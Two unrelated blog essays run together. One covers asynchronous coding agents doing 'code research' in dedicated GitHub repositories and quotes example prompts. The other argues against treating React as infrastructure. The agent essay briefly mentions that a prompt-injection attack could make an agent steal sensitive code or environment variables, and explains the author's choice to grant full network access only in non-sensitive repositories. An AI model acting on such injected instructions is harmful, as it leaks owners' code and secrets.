Code research projects with async coding agents like Claude Code and Codex

I've been experimenting with a pattern for LLM usage recently that's working out really well: asynchronous code research tasks . Pick a research question, spin up an asynchronous coding agent and let it go and run some experiments and report back when it's done. Software development benefits enormously from something I call code research . The great thing about questions about code is that they can often be definitively answered by writing and executing code. I often see questions on forums which hint at a lack of understanding of this skill. "Could Redis work for powering the notifications feed for my app?" is a great example. The answer is always "it depends", but a better answer is that a good programmer already has everything they need to answer that question for themselves. Build a proof-of-concept, simulate the patterns you expect to see in production, then run experiments to see if it's going to work. I've been a keen practitioner of code research for a long time. Many of my most interesting projects started out as a few dozen lines of experimental code to prove to myself that something was possible. It turns out coding agents like Claude Code and Codex are a fantastic fit for this kind of work as well. Give them the right goal and a useful environment and they'll churn through a basic research project without any further supervision. LLMs hallucinate and make mistakes. This is far less important for code research tasks because the code itself doesn't lie: if they write code and execute it and it does the right things then they've demonstrated to both themselves and to you that something really does work. They can't prove something is impossible - just because the coding agent couldn't find a way to do something doesn't mean it can't be done - but they can often demonstrate that something is possible in just a few minutes of crunching. I've used interactive coding agents like Claude Code and Codex CLI for a bunch of these, but today I'm increasingly turning to their asynchronous coding agent family members instead. An asynchronous coding agent is a coding agent that operates on a fire-and-forget basis. You pose it a task, it churns away on a server somewhere and when it's done it files a pull request against your chosen GitHub repository. OpenAI's Codex Cloud , Anthropic's Claude Code for web , Google Gemini's Jules , and GitHub's Copilot coding agent are four prominent examples of this pattern. These are fantastic tools for code research projects. Come up with a clear goal, turn it into a few paragraphs of prompt, set them loose and check back ten minutes later to see what they've come up with. I'm firing off 2-3 code research projects a day right now. My own time commitment is minimal and they frequently come back with useful or interesting results. You can run a code research task against an existing GitHub repository, but I find it's much more liberating to have a separate, dedicated repository for your coding agents to run their projects in. This frees you from being limited to research against just code you've already written, and also means you can be much less cautious about what you let the agents do. I have two repositories that I use for this - one public, one private. I use the public one for research tasks that have no need to be private, and the private one for anything that I'm not yet ready to share with the world. The biggest benefit of a dedicated repository is that you don't need to be cautious about what the agents operating in that repository can do. Both Codex Cloud and Claude Code for web default to running agents in a locked-down environment, with strict restrictions on how they can access the network. This makes total sense if they are running against sensitive repositories - a prompt injection attack of the lethal trifecta variety could easily be used to steal sensitive code or environment variables. If you're running in a fresh, non-sensitive repository you don't need to worry about this at all! I've configured my research repositories for full network access, which means my coding agents can install any dependencies they need, fetch data from the web and generally do anything I'd be able to do on my own computer. Let's dive into some examples. My public research repository is at simonw/research on GitHub. It currently contains 13 folders, each of which is a separate research project. I only created it two weeks ago so I'm already averaging nearly one a day! It also includes a GitHub Workflow which uses GitHub Models to automatically update the README file with a summary of every new project, using Cog , LLM , llm-github-models and this snippet of Python . Here are a some example research projects from the repo. node-pyodide shows an example of a Node.js script that runs the Pyodide WebAssembly distribution of Python inside it - yet another of my ongoing attempts to find a great way of running Python in a WebAssembly sandbox on a server. python-markdown-comparison ( transcript ) provides a detailed performance benchmark of seven different Python Markdown libraries. I fired this one off because I stumbled across cmarkgfm , a Python binding around GitHub's Markdown implementation in C, and wanted to see how it compared to the other options. This one produced some charts! came out on top by a significant margin: Here's the entire prompt I used for that project: Create a performance benchmark and feature comparison report on PyPI cmarkgfm compared to other popular Python markdown libraries - check all of them out from github and read the source to get an idea for features, then design and run a benchmark including generating some charts, then create a report in a new python-markdown-comparison folder (do not create a _summary.md file or edit anywhere outside of that folder). Make sure the performance chart images are directly displayed in the README.md in the folder. Note that I didn't specify any Markdown libraries other than - Claude Code ran a search and found the other six by itself. cmarkgfm-in-pyodide is a lot more fun. A neat thing about having all of my research projects in the same repository is that new projects can build on previous ones. Here I decided to see how hard it would be to get - which has a C extension - working inside Pyodide inside Node.js. Claude successfully compiled a 88.4KB file with the necessary C extension and proved it could be loaded into Pyodide in WebAssembly inside of Node.js. I ran this one using Claude Code on my laptop after an initial attempt failed. The starting prompt was: Figure out how to get the cmarkgfm markdown lover [typo in prompt, this should have been "library" but it figured it out anyway] for Python working in pyodide. This will be hard because it uses C so you will need to compile it to pyodide compatible webassembly somehow. Write a report on your results plus code to a new cmarkgfm-in-pyodide directory. Test it using pytest to exercise a node.js test script that calls pyodide as seen in the existing node.js and pyodide directory There is an existing branch that was an initial attempt at this research, but which failed because it did not have Internet access. You do have Internet access. Use that existing branch to accelerate your work, but do not commit any code unless you are certain that you have successfully executed tests that prove that the pyodide module you created works correctly. This one gave up half way through, complaining that emscripten would take too long. I told it: Complete this project, actually run emscripten, I do not care how long it takes, update the report if it works It churned away for a bit longer and complained that the existing Python library used CFFI which isn't available in Pyodide. I asked it: Can you figure out how to rewrite cmarkgfm to not use FFI and to use a pyodide-friendly way of integrating that C code instead? ... and it did. You can see the full transcript here . blog-tags-scikit-learn . Taking a short break from WebAssembly, I thought it would be fun to put scikit-learn through its paces on a text classification task against my blog: Work in a new folder called blog-tags-scikit-learn Download - a SQLite database. Take a look at the blog_entry table and the associated tags - a lot of the earlier entries do not have tags associated with them, where the later entries do. Design, implement and execute models to suggests tags for those earlier entries based on textual analysis against later ones Use Python scikit learn and try several different strategies Produce JSON of the results for each one, plus scripts for running them and a detailed markdown description Also include an HTML page with a nice visualization of the results that works by loading those JSON files. This resulted in seven files, four results files and a detailed report . (It ignored the bit about an HTML page with a nice visualization for some reason.) Not bad for a few moments of idle curiosity typed into my phone! That's just three of the thirteen projects in the repository so far. The commit history for each one usually links to the prompt and sometimes the transcript if you want to see how they unfolded. More recently I added a short file to the repo with a few extra tips for my research agents. You can read that here . My preferred definition of AI slop is AI-generated content that is published without human review. I've not been reviewing these reports in great detail myself, and I wouldn't usually publish them online without some serious editing and verification. I want to share the pattern I'm using though, so I decided to keep them quarantined in this one public repository. A tiny feature request for GitHub: I'd love to be able to mark a repository as "exclude from search indexes" such that it gets labelled with tags. I still like to keep AI-generated content out of search, to avoid contributing more to the dead internet . It's pretty easy to get started trying out this coding agent research pattern. Create a free GitHub repository (public or private) and let some agents loose on it and see what happens. You can run agents locally but I find the asynchronous agents to be more convenient - especially as I can run them (or trigger them from my phone) without any fear of them damaging my own machine or leaking any of my private data. Claude Code for web offers a free $250 of credits for their $20/month users for a limited time (until November 18, 2025). Gemini Jules has a free tier . There are plenty of other coding agents you can try out as well. Let me know if your research agents come back with anything interesting! You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . Code research Coding agents Asynchronous coding agents Give them a dedicated GitHub repository Let them rip with unlimited network access My simonw/research collection This is total slop, of course Try it yourself

0 views
Den Odell 1 months ago

Escape Velocity: Break Free from Framework Gravity

Frameworks were supposed to free us from the messy parts of the web. For a while they did, until their gravity started drawing everything else into orbit. Every framework brought with it real progress. React, Vue, Angular, Svelte, and others all gave structure, composability, and predictability to frontend work. But now, after a decade of React dominance, something else has happened. We haven’t just built apps with React, we’ve built an entire ecosystem around it—hiring pipelines, design systems, even companies—all bound to its way of thinking. The problem isn’t React itself, nor any other framework for that matter. The problem is the inertia that sets in once any framework becomes infrastructure. By that point, it’s “too important to fail,” and everything nearby turns out to be just fragile enough to prove it. React is no longer just a library. It’s a full ecosystem that defines how frontend developers are allowed to think. Its success has created its own kind of gravity, and the more we’ve built within it, the harder it’s become to break free. Teams standardize on it because it’s safe: it’s been proven to work at massive scale, the talent pool is large, and the tooling is mature. That’s a rational choice, but it also means React exerts institutional gravity. Moving off it stops being an engineering decision and becomes an organizational risk instead. Solutions to problems tend to be found within its orbit, because stepping outside it feels like drifting into deep space. We saw this cycle with jQuery in the past, and we’re seeing it again now with React. We’ll see it with whatever comes next. Success breeds standardization, standardization breeds inertia, and inertia convinces us that progress can wait. It’s the pattern itself that’s the problem, not any single framework. But right now, React sits at the center of this dynamic, and the stakes are far higher than they ever were with jQuery. Entire product lines, architectural decisions, and career paths now depend on React-shaped assumptions. We’ve even started defining developers by their framework: many job listings ask for “React developers” instead of frontend engineers. Even AI coding agents default to React when asked to start a new frontend project, unless deliberately steered elsewhere. Perhaps the only thing harder than building on a framework is admitting you might need to build without one. React’s evolution captures this tension perfectly. Recent milestones include the creation of the React Foundation , the React Compiler reaching v1.0 , and new additions in React 19.2 such as the and Fragment Refs. These updates represent tangible improvements. Especially the compiler, which brings automatic memoization at build time, eliminating the need for manual and optimization. Production deployments show real performance wins using it: apps in the Meta Quest Store saw up to 2.5x faster interactions as a direct result. This kind of automatic optimization is genuinely valuable work that pushes the entire ecosystem forward. But here’s the thing: the web platform has been quietly heading in the same direction for years, building many of the same capabilities frameworks have been racing to add. Browsers now ship View Transitions, Container Queries, and smarter scheduling primitives. The platform keeps evolving at a fair pace, but most teams won’t touch these capabilities until React officially wraps them in a hook or they show up in Next.js docs. Innovation keeps happening right across the ecosystem, but for many it only becomes “real” once React validates the approach. Which is fine, assuming you enjoy waiting for permission to use the platform you’re already building on. The React Foundation represents an important milestone for governance and sustainability. This new foundation is a part of the Linux Foundation, and founding members include Meta, Vercel, Microsoft, Amazon, Expo, Callstack, and Software Mansion. This is genuinely good for React’s long-term health, providing better governance and removing the risk of being owned by a single company. It ensures React can outlive any one organization’s priorities. But it doesn’t fundamentally change the development dynamic of the framework. Yet. The engineers who actually build React still work at companies like Meta and Vercel. The research still happens at that scale, driven by those performance needs. The roadmap still reflects the priorities of the companies that fund full-time development. And to be fair, React operates at a scale most frameworks will never encounter. Meta serves billions of users through frontends that run on constrained mobile devices around the world, so it needs performance at a level that justifies dedicated research teams. The innovations they produce, including compiler-driven optimization, concurrent rendering, and increasingly fine-grained performance tooling, solve real problems that exist only at that kind of massive scale. But those priorities aren’t necessarily your priorities, and that’s the tension. React’s innovations are shaped by the problems faced by companies running apps at billions-of-users scale, not necessarily the problems faced by teams building for thousands or millions. React’s internal research reveals the team’s awareness of current architectural limitations. Experimental projects like Forest explore signal-like lazy computation graphs; essentially fine-grained reactivity instead of React’s coarse re-render model. Another project, Fir , investigates incremental rendering techniques. These aren’t roadmap items; they’re just research prototypes happening inside Meta. They may never ship publicly. But they do reveal something important: React’s team knows the virtual DOM model has performance ceilings and they’re actively exploring what comes after it. This is good research, but it also illustrates the same dynamic at play again: that these explorations happen behind the walls of Big Tech, on timelines set by corporate priorities and resource availability. Meanwhile, frameworks like Solid and Qwik have been shipping production-ready fine-grained reactivity for years. Svelte 5 shipped runes in 2024, bringing signals to mainstream adoption. The gap isn’t technical capability, but rather when the industry feels permission to adopt it. For many teams, that permission only comes once React validates the approach. This is true regardless of who governs the project or what else exists in the ecosystem. I don’t want this critique to take away from what React has achieved over the past twelve years. React popularized declarative UIs and made component-based architecture mainstream, which was a huge deal in itself. It proved that developer experience matters as much as runtime performance and introduced the idea that UI could be a pure function of input props and state. That shift made complex interfaces far easier to reason about. Later additions like hooks solved the earlier class component mess elegantly, and concurrent rendering through `` opened new possibilities for truly responsive UIs. The React team’s research into compiler optimization, server components, and fine-grained rendering pushes the entire ecosystem forward. This is true even when other frameworks ship similar ideas first. There’s value in seeing how these patterns work at Meta’s scale. The critique isn’t that React is bad, but that treating any single framework as infrastructure creates blind spots in how we think and build. When React becomes the lens through which we see the web, we stop noticing what the platform itself can already do, and we stop reaching for native solutions because we’re waiting for the framework-approved version to show up first. And crucially, switching to Solid, Svelte, or Vue wouldn’t eliminate this dynamic; it would only shift its center of gravity. Every framework creates its own orbit of tools, patterns, and dependencies. The goal isn’t to find the “right” framework, but to build applications resilient enough to survive migration to any framework, including those that haven’t been invented yet. This inertia isn’t about laziness; it’s about logistics. Switching stacks is expensive and disruptive. Retraining developers, rebuilding component libraries, and retooling CI pipelines all take time and money, and the payoff is rarely immediate. It’s high risk, high cost, and hard to justify, so most companies stay put, and honestly, who can blame them? But while we stay put, the platform keeps moving. The browser can stream and hydrate progressively, animate transitions natively, and coordinate rendering work without a framework. Yet most development teams won’t touch those capabilities until they’re built in or officially blessed by the ecosystem. That isn’t an engineering limitation; it’s a cultural one. We’ve somehow made “works in all browsers” feel riskier than “works in our framework.” Better governance doesn’t solve this. The problem isn’t React’s organizational structure; it’s our relationship to it. Too many teams wait for React to package and approve platform capabilities before adopting them, even when those same features already exist in browsers today. React 19.2’s `` component captures this pattern perfectly. It serves as a boundary that hides UI while preserving component state and unmounting effects. When set to , it pauses subscriptions, timers, and network requests while keeping form inputs and scroll positions intact. When revealed again by setting , those effects remount cleanly. It’s a genuinely useful feature. Tabbed interfaces, modals, and progressive rendering all benefit from it, and the same idea extends to cases where you want to pre-render content in the background or preserve state as users navigate between views. It integrates smoothly with React’s lifecycle and `` boundaries, enabling selective hydration and smarter rendering strategies. But it also draws an important line between formalization and innovation . The core concept isn’t new; it’s simply about pausing side effects while maintaining state. Similar behavior can already be built with visibility observers, effect cleanup, and careful state management patterns. The web platform even provides the primitives for it through tools like , DOM state preservation, and manual effect control. What . Yet it also exposes how dependent our thinking has become on frameworks. We wait for React to formalize platform behaviors instead of reaching for them directly. This isn’t a criticism of `` itself; it’s a well-designed API that solves a real problem. But it serves as a reminder that we’ve grown comfortable waiting for framework solutions to problems the platform already lets us solve. After orbiting React for so long, we’ve forgotten what it feels like to build without its pull. The answer isn’t necessarily to abandon your framework, but to remember that it runs inside the web, not the other way around. I’ve written before about building the web in islands as one way to rediscover platform capabilities we already have. Even within React’s constraints, you can still think platform first: These aren’t anti-React practices, they’re portable practices that make your web app more resilient. They let you adopt new browser capabilities as soon as they ship, not months later when they’re wrapped in a hook. They make framework migration feasible rather than catastrophic. When you build this way, React becomes a rendering library that happens to be excellent at its job, not the foundation everything else has to depend on. A React app that respects the platform can outlast React itself. When you treat React as an implementation detail instead of an identity, your architecture becomes portable. When you embrace progressive enhancement and web semantics, your ideas survive the next framework wave. The recent wave of changes, including the React Foundation, React Compiler v1.0, the `` component, and internal research into alternative architectures, all represent genuine progress. The React team is doing thoughtful work, but these updates also serve as reminders of how tightly the industry has become coupled to a single ecosystem’s timeline. That timeline is still dictated by the engineering priorities of large corporations, and that remains true regardless of who governs the project. If your team’s evolution depends on a single framework’s roadmap, you are not steering your product; you are waiting for permission to move. That is true whether you are using React, Vue, Angular, or Svelte. The framework does not matter; the dependency does. It is ironic that we spent years escaping jQuery’s gravity, only to end up caught in another orbit. React was once the radical idea that changed how we build for the web. Every successful framework reaches this point eventually, when it shifts from innovation to institution, from tool to assumption. jQuery did it, React did it, and something else will do it next. The React Foundation is a positive step for the project’s long-term sustainability, but the next real leap forward will not come from better governance. It will not come from React finally adopting signals either, and it will not come from any single framework “getting it right.” Progress will come from developers who remember that frameworks are implementation details, not identities. Build for the platform first. Choose frameworks second. The web isn’t React’s, it isn’t Vue’s, and it isn’t Svelte’s. It belongs to no one. If we remember that, it will stay free to evolve at its own pace, drawing the best ideas from everywhere rather than from whichever framework happens to hold the cultural high ground. Frameworks are scaffolding, not the building. Escaping their gravity does not mean abandoning progress; it means finding enough momentum to keep moving. Reaching escape velocity, one project at a time. Use native forms and form submissions to a server, then enhance with client-side logic Prefer semantic HTML and ARIA before reaching for component libraries Try View Transitions directly with minimal React wrappers instead of waiting for an official API Use Web Components for self-contained widgets that could survive a framework migration Keep business logic framework-agnostic, plain TypeScript modules rather than hooks, and aim to keep your hooks short by pulling logic from outside React Profile performance using browser DevTools first and React DevTools second Try native CSS features like , , scroll snap , , and before adding JavaScript solutions Use , , and instead of framework-specific alternatives wherever possible Experiment with the History API ( , ) directly before reaching for React Router Structure code so routing, data fetching, and state management can be swapped out independently of React Test against real browser APIs and behaviors, not just framework abstractions

0 views